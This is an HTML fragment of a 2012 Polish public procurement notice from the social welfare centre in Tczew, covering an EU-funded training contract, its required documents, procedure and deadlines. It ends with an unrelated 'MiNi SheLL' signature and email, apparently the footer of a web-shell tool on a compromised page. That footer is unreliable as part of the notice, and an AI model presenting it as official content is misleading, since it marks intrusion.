<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Opis sposobu realizacji zamówienia - program szkolenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotapomorza.pl/pl/bip/gminy/tczew-miasto/mops_tczew<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
83 - 110 Tczew
ul. Armii Krajowej 39
fax: (58) 532 - 60 -03.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2012 godzina 10:00, miejsce: Sekretariat Miejskiego Ośrodka Pomocy Społecznej w Tczewie przy ul. Armii Krajowej 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie kierowane jest do kobiet i mężczyzn, w tym osób niepełnosprawnych uczestniczących w projekcie pn. Akademia Aktywnych - rozwój i upowszechnienie aktywnej integracji przez Miejski Ośrodek Pomocy Społecznej w Tczewie w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki, współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Szkoleniem  objęte zostaną osoby bezrobotne, nieaktywne zawodowo lub zatrudnione zagrożone wykluczeniem społecznym, będące w wieku aktywności zawodowej i korzystające ze świadczeń pomocy społecznej MOPS w Tczewie w rozumieniu przepisów o pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com